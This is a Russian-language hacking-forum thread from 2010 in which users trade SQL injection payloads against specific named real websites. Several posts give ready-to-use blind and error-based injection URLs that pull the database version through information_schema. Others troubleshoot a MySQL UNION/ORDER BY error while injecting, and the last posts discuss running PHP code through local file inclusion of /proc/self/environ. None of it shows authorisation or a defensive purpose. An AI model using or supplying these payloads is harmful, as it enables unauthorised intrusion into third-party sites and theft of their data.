
11.05.2010, 00:10
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
С нами:
11010660
Репутация:
439
|
|
Сообщение от pinch
не смог =(...
http://www.sun-e-shop.co.za/?Task=CompanyInfo&CategoryID=3777
там походу нет инъекции.
у меня тут тоже пару подсобралось
http://www.colorlines.com/article.php?ID=681'
http://thetvdb.com/index.php?tab=series&id=79771'
http://www.worstpreviews.com/headline.php?id=15683
не получилось раскрутить
|
|
|

11.05.2010, 00:23
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
2BrainDeaD
http://www.colorlines.com/article.php?ID=681+and+substring(@@version,1,1)=4+--
крути как блинд
|
|
|

11.05.2010, 00:34
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами:
9649706
Репутация:
3338
|
|
Код:
1)http://www.colorlines.com/article.php?ID=681+or+1=1+and+substring(version(),1,1)=4
2) http://thetvdb.com/index.php?tab=series&id=79771+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
3) http://www.worstpreviews.com/headline.php?id=15683+or+1=1+and+substring(version(),1,1)=5
|
|
|

11.05.2010, 00:46
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
#1221 - Incorrect usage of UNION and ORDER BY
как бороться?
limit , второй параметр...
|
|
|

11.05.2010, 01:13
|
|
Постоянный
Регистрация: 09.06.2005
Сообщений: 531
С нами:
11010660
Репутация:
439
|
|
Сообщение от Pashkela
Код:
1)http://www.colorlines.com/article.php?ID=681+or+1=1+and+substring(version(),1,1)=4
2) http://thetvdb.com/index.php?tab=series&id=79771+and+(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2)a)--+
3) http://www.worstpreviews.com/headline.php?id=15683+or+1=1+and+substring(version(),1,1)=5
странно, 1 и 3 ничего не выводит, или я что-то недопонял.
|
|
|

11.05.2010, 00:54
|
|
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
С нами:
8700497
Репутация:
388
|
|
2Strilo4ka дай посмотреть плз
|
|
|

11.05.2010, 00:57
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
С нами:
9000386
Репутация:
1148
|
|
Сообщение от Bb0y
2Strilo4ka дай посмотреть плз
 двиг 102 атрибута, и второй параметр в лимите.
не скажу.
up
вот:
(SELECT 1 FROM (select 1 union select 2)x order by 1 limit 0,1) union (select 1)
Showing rows 0 - 0 (1 total, Query took 0.0009 sec)
SELECT 1 FROM (select 1 union select 2)x order by 1 limit 0,1 union select 1
#1221 - Incorrect usage of UNION and ORDER BY
Понятно что скобки, то не поставить... Идеи?
Последний раз редактировалось Strilo4ka; 11.05.2010 в 01:06..
|
|
|

11.05.2010, 01:29
|
|
Новичок
Регистрация: 22.01.2009
Сообщений: 11
С нами:
9105364
Репутация:
3
|
|
Часто встречал при LFI при инклюде /proc/self/status встречается 'php5-cgi', в таком случае, при доступе к /proc/self/environ не интерпритируется PHP-код (проверял много раз).
Объясните, почему?
|
|
|

11.05.2010, 14:24
|
|
Познающий
Регистрация: 26.03.2008
Сообщений: 31
С нами:
9541076
Репутация:
82
|
|
Сообщение от DIEZalok
Часто встречал при LFI при инклюде /proc/self/status встречается 'php5-cgi', в таком случае, при доступе к /proc/self/environ не интерпритируется PHP-код (проверял много раз).
Объясните, почему?
значит это не LFI, а fopen или file_get_contents
|
|
|

11.05.2010, 15:45
|
|
Новичок
Регистрация: 22.01.2009
Сообщений: 11
С нами:
9105364
Репутация:
3
|
|
Сообщение от Анжелика
значит это не LFI, а fopen или file_get_contents
Я умею отличать LFI от остального. Я же написал!
Каждый раз, когда преписка cgi, php код не интерпритируется!
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|